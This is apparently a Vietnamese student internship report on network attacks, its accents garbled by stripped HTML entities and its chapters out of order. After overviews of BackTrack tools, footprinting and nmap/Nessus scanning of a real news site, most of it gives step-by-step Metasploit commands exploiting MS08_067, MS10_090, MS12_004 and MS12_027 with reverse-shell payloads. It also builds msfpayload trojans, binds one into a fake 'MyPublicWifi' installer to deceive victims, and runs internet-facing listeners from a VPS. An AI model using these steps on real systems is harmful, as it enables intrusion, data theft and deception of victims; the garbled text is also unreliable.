thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
